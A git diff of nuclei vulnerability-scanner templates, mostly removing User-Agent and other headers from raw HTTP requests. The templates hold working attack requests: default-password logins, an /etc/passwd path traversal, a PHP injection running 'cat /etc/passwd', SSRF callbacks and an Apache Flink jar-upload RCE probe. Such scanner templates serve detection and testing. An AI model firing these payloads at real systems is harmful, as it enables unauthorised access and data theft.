a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml @@ -11,9 +11,7 @@ requests: - | POST /sess-bin/login_handler.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Referer: http://{{Hostname}}/sess-bin/login_session.cgi - Connection: close + Referer: {{BaseURL}}/sess-bin/login_session.cgi username=admin&passwd=admin diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml index 8cde0421ba..b44818775d 100644 --- a/default-logins/nexus/nexus-default-password.yaml +++ b/default-logins/nexus/nexus-default-password.yaml @@ -11,10 +11,8 @@ requests: - | POST /service/rapture/session HTTP/1.1 Host: {{Hostname}} - Content-Length: 43 X-Nexus-UI: true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Connection: close username=YWRtaW4%3D&password=YWRtaW4xMjM%3D diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 25da32202d..528c4f0c65 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -10,14 +10,10 @@ requests: - raw: - | POST /xmlpserver/services/XMLPService HTTP/1.1 + Host: {{Hostname}} Content-Type: text/xml SOAPAction: "" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Encoding: gzip,deflate - Content-Length: 771 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 - Host: {{Hostname}} - Connection: Keep-alive diff --git a/default-logins/panabit/panabit-default-password.yaml b/default-logins/panabit/panabit-default-password.yaml index 1aff766c6b..5974205e14 100644 --- a/default-logins/panabit/panabit-default-password.yaml +++ b/default-logins/panabit/panabit-default-password.yaml @@ -12,14 +12,11 @@ requests: - | POST /login/userverify.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 246 Origin: {{BaseURL}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Referer: {{BaseURL}}/login/login.htm Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundaryAjZMsILtbrBp8VbC Content-Disposition: form-data; name="username" diff --git a/default-logins/rockmongo/rockmongo-default-credentials.yaml b/default-logins/rockmongo/rockmongo-default-credentials.yaml index 2e2ec7b575..179b53aca2 100644 --- a/default-logins/rockmongo/rockmongo-default-credentials.yaml +++ b/default-logins/rockmongo/rockmongo-default-credentials.yaml @@ -11,7 +11,6 @@ requests: - | POST /index.php?action=login.index HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/index.php?action=login.index diff --git a/default-logins/spectracom/spectracom-default-credential.yaml b/default-logins/spectracom/spectracom-default-credential.yaml index 408747ba1f..e552e1251c 100644 --- a/default-logins/spectracom/spectracom-default-credential.yaml +++ b/default-logins/spectracom/spectracom-default-credential.yaml @@ -11,10 +11,7 @@ requests: - | POST /users/login HTTP/1.1 Host: {{Hostname}} - Accept-Language: en Content-Type: application/x-www-form-urlencoded - Content-Length: 98 - Connection: close data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123 diff --git a/default-logins/viewpoint/trilithic-viewpoint-default.yaml b/default-logins/viewpoint/trilithic-viewpoint-default.yaml index 6cd0fc44e6..0a09c29d59 100644 --- a/default-logins/viewpoint/trilithic-viewpoint-default.yaml +++ b/default-logins/viewpoint/trilithic-viewpoint-default.yaml @@ -13,7 +13,6 @@ requests: - | POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 Host: {{Hostname}} - Content-Length: 65 Content-Type: application/json Cookie: trilithic_win_auth=false diff --git a/default-logins/wso2/wso2-default-password.yaml b/default-logins/wso2/wso2-default-password.yaml index 4e89966a66..70b283e8c0 100644 --- a/default-logins/wso2/wso2-default-password.yaml +++ b/default-logins/wso2/wso2-default-password.yaml @@ -13,11 +13,9 @@ requests: POST /carbon/admin/login_action.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Accept-Language: en-US,en;q=0.9 - Connection: close - Content-Length: 29 username=admin&password=admin + redirects: false matchers: - type: word diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index 3eb0a84a80..bab7c5bb49 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -12,7 +12,6 @@ requests: - | POST /xxl-job-admin/login HTTP/1.1 Host:{{Hostname}} - Content-Length: 30 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 userName=admin&password=123456 diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml index 151404574c..4a0bcf6c89 100644 --- a/exposed-panels/acunetix-panel.yaml +++ b/exposed-panels/acunetix-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/#/login" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and matchers: - type: word diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml index 4fd18bcda4..b0a82d7536 100644 --- a/exposed-panels/atlassian-crowd-panel.yaml +++ b/exposed-panels/atlassian-crowd-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml index 4aa65b0e49..f860ce5306 100644 --- a/exposed-panels/checkmarx-panel.yaml +++ b/exposed-panels/checkmarx-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/cxwebclient/Login.aspx" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers: - type: word words: diff --git a/exposed-panels/citrix-adc-gateway-detect.yaml b/exposed-panels/citrix-adc-gateway-detect.yaml index 259215205d..e72716c96a 100644 --- a/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/exposed-panels/citrix-adc-gateway-detect.yaml @@ -11,10 +11,8 @@ requests: path: - '{{BaseURL}}/logon/LogonPoint/index.html' - '{{BaseURL}}/logon/LogonPoint/custom.html' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - - _ctxstxt_CitrixCopyright + - '_ctxstxt_CitrixCopyright' \ No newline at end of file diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml index 376f2370b6..ba05fd5775 100644 --- a/exposed-panels/couchdb-exposure.yaml +++ b/exposed-panels/couchdb-exposure.yaml @@ -9,8 +9,7 @@ requests: - method: GET path: - '{{BaseURL}}/_all_dbs' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word @@ -22,4 +21,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml index 0b1a054100..8347c49d41 100644 --- a/exposed-panels/nessus-panel.yaml +++ b/exposed-panels/nessus-panel.yaml @@ -10,18 +10,19 @@ requests: - method: GET path: - "{{BaseURL}}/server/status" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and matchers: - type: word words: - '{"code":200,"progress":null,"status":"ready"}' part: body + - type: word words: - 'NessusWWW' part: header + - type: status status: - 200 diff --git a/exposed-panels/prometheus-exporter-detect.yaml b/exposed-panels/prometheus-exporter-detect.yaml index b77807a555..75e9249134 100644 --- a/exposed-panels/prometheus-exporter-detect.yaml +++ b/exposed-panels/prometheus-exporter-detect.yaml @@ -11,8 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word @@ -20,6 +19,7 @@ requests: - Exporter # Exporters have "Exporter" in the page title (e.g, Node Exporter, Bind Exporter and so on) - /metrics condition: and + extractors: # Extract exporter name - type: regex part: body diff --git a/exposed-panels/solarwinds-orion.yaml b/exposed-panels/solarwinds-orion.yaml index 22d351173f..e50b653a22 100644 --- a/exposed-panels/solarwinds-orion.yaml +++ b/exposed-panels/solarwinds-orion.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/Orion/Login.aspx" - headers: - User-Agent: "Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0" + matchers: - type: word words: diff --git a/exposures/configs/ruijie-eg-password-leak.yaml b/exposures/configs/ruijie-eg-password-leak.yaml index 884592d400..2cd5c661e3 100644 --- a/exposures/configs/ruijie-eg-password-leak.yaml +++ b/exposures/configs/ruijie-eg-password-leak.yaml @@ -15,9 +15,7 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password=admin?show+webmaster+user diff --git a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml index 2af510fdfd..e07c091886 100644 --- a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml +++ b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml @@ -15,7 +15,6 @@ requests: POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Content-Length: 111 command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. diff --git a/exposures/logs/oracle-ebs-sqllog-disclosure.yaml b/exposures/logs/oracle-ebs-sqllog-disclosure.yaml index c98779e230..44c22c100b 100644 --- a/exposures/logs/oracle-ebs-sqllog-disclosure.yaml +++ b/exposures/logs/oracle-ebs-sqllog-disclosure.yaml @@ -11,8 +11,6 @@ requests: - method: GET path: - '{{BaseURL}}/OA_HTML/bin/sqlnet.log' - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" matchers-condition: and matchers: diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 40ef7fe623..63669a0060 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -16,37 +16,25 @@ requests: GET /N0t4xist*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | GET /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | OPTIONS /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 req-condition: true matchers: diff --git a/fuzzing/xff-403-bypass.yaml b/fuzzing/xff-403-bypass.yaml index 694ada23cb..ea2bdc4bf0 100644 --- a/fuzzing/xff-403-bypass.yaml +++ b/fuzzing/xff-403-bypass.yaml @@ -12,30 +12,18 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - | GET /test.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 req-condition: true diff --git a/iot/targa-camera-ssrf.yaml b/iot/targa-camera-ssrf.yaml index d62c5f6c25..774cf2a690 100644 --- a/iot/targa-camera-ssrf.yaml +++ b/iot/targa-camera-ssrf.yaml @@ -13,12 +13,8 @@ requests: - | POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 content-type: application/json Accept: */* - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://{{interactsh-url}}","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 31e4f967e5..a6187d442a 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -12,17 +12,13 @@ requests: - | GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/123 Referer: {{BaseURL}} - Connection: close Accept-Encoding: gzip, deflate - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/123 Referer: {{BaseURL}} - Connection: close Accept-Encoding: gzip, deflate matchers-condition: and diff --git a/misconfiguration/aem/aem-hash-querybuilder.yaml b/misconfiguration/aem/aem-hash-querybuilder.yaml index 7b6326ae47..50ae6efbd4 100644 --- a/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -12,13 +12,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: diff --git a/misconfiguration/aem/aem-jcr-querybuilder.yaml b/misconfiguration/aem/aem-jcr-querybuilder.yaml index d3eafcce9e..29bc15e28f 100644 --- a/misconfiguration/aem/aem-jcr-querybuilder.yaml +++ b/misconfiguration/aem/aem-jcr-querybuilder.yaml @@ -11,13 +11,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: diff --git a/misconfiguration/aspx-debug-mode.yaml b/misconfiguration/aspx-debug-mode.yaml index 1879d55864..97a411ee38 100644 --- a/misconfiguration/aspx-debug-mode.yaml +++ b/misconfiguration/aspx-debug-mode.yaml @@ -13,9 +13,7 @@ requests: DEBUG /Foobar-debug.aspx HTTP/1.1 Host: {{Hostname}} Command: stop-debug - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Length: 2 matchers-condition: and diff --git a/misconfiguration/cloudflare-image-ssrf.yaml b/misconfiguration/cloudflare-image-ssrf.yaml index 53750448b2..8ab2ad1a4c 100644 --- a/misconfiguration/cloudflare-image-ssrf.yaml +++ b/misconfiguration/cloudflare-image-ssrf.yaml @@ -13,10 +13,7 @@ requests: - | GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en matchers: - type: word diff --git a/misconfiguration/iis-internal-ip-disclosure.yaml b/misconfiguration/iis-internal-ip-disclosure.yaml index ea0a55b062..100c18eaf3 100644 --- a/misconfiguration/iis-internal-ip-disclosure.yaml +++ b/misconfiguration/iis-internal-ip-disclosure.yaml @@ -12,7 +12,6 @@ requests: - |+ GET / HTTP/1.0 Host: - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept: */* unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. diff --git a/misconfiguration/ssrf-via-oauth-misconfig.yaml b/misconfiguration/ssrf-via-oauth-misconfig.yaml index 5efd759888..c4c61ac7c2 100644 --- a/misconfiguration/ssrf-via-oauth-misconfig.yaml +++ b/misconfiguration/ssrf-via-oauth-misconfig.yaml @@ -14,9 +14,7 @@ requests: POST /connect/register HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept-Language: en-US,en;q=0.9 - Connection: close { "application_type": "web", diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 39d1765923..89ef10ba1b 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -9,8 +9,7 @@ requests: - method: GET path: - '{{BaseURL}}/__clockwork/app' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: status diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index fa7f636dfb..9d8bb598ff 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index f11ad8b32e..bddc00552b 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index bc21d228dd..e25dc371e6 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 94265b4d98..7677292de5 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -7,11 +7,8 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) - # iDRAC9 has a different endpoint than 8 and below. matchers-condition: and matchers: diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index 81a345b473..c35b4dd301 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -11,8 +11,7 @@ requests: - "{{BaseURL}}/login?next=%2F" - "{{BaseURL}}/bundles/login.bundle.js" - "{{BaseURL}}/bundles/kibana.style.css" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index 2620f82dc9..ebf42ab88b 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -10,8 +10,7 @@ requests: path: - '{{BaseURL}}/api/jsonws' - '{{BaseURL}}/api/jsonws/invoke' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/technologies/pega-detect.yaml b/technologies/pega-detect.yaml index 81b02f15bc..d424da54ad 100644 --- a/technologies/pega-detect.yaml +++ b/technologies/pega-detect.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word diff --git a/technologies/prometheus-exposed-panel.yaml b/technologies/prometheus-exposed-panel.yaml index 371360dff8..b107509968 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/technologies/prometheus-exposed-panel.yaml @@ -8,8 +8,7 @@ requests: - method: GET path: - '{{BaseURL}}/graph' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml index bb2304cee1..ccc8012049 100644 --- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml +++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml @@ -4,7 +4,7 @@ info: name: Apache Flink Unauth RCE author: pikpikcu severity: critical - tags: apache,flink,rce + tags: apache,flink,rce,intrusive reference: - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 @@ -15,15 +15,13 @@ requests: - | POST /jars/upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 187 Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 --8ce4b16b22b58894aa86c421e8759df3 Content-Disposition: form-data; name="jarfile";filename="poc.jar" Content-Type:application/octet-stream - nuclei + {{randstr}} --8ce4b16b22b58894aa86c421e8759df3-- matchers-condition: and diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 8941ffc298..5807e86979 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -13,11 +13,6 @@ requests: path: - "{{BaseURL}}/adjuncts/3a890183/" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and matchers: - type: word @@ -26,6 +21,7 @@ requests: - "String index out of range" part: body condition: and + - type: status status: - 500 diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index cd7dd6cd13..0336b5eaa4 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -11,14 +11,8 @@ requests: - | POST /jolokia/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded - Content-Length: 136 + { "type":"EXEC", diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index bbc2bcfd66..5f888337fc 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -13,11 +13,7 @@ requests: - | POST /install/install.php?step=4 HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close - Content-Length: 95 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A @@ -25,10 +21,7 @@ requests: - | GET /install/includes/configure.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept-Encoding: gzip, deflate Accept: */* - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index 6af3338d7f..96e46cec40 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -20,7 +20,6 @@ requests: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 X-Requested-With: XMLHttpRequest Referer: {{Hostname}} diff --git a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml index 8dc442db63..94cac428de 100644 --- a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml +++ b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml @@ -12,14 +12,10 @@ requests: - | POST /Upload/upload_file.php?l=test HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 Cookie: 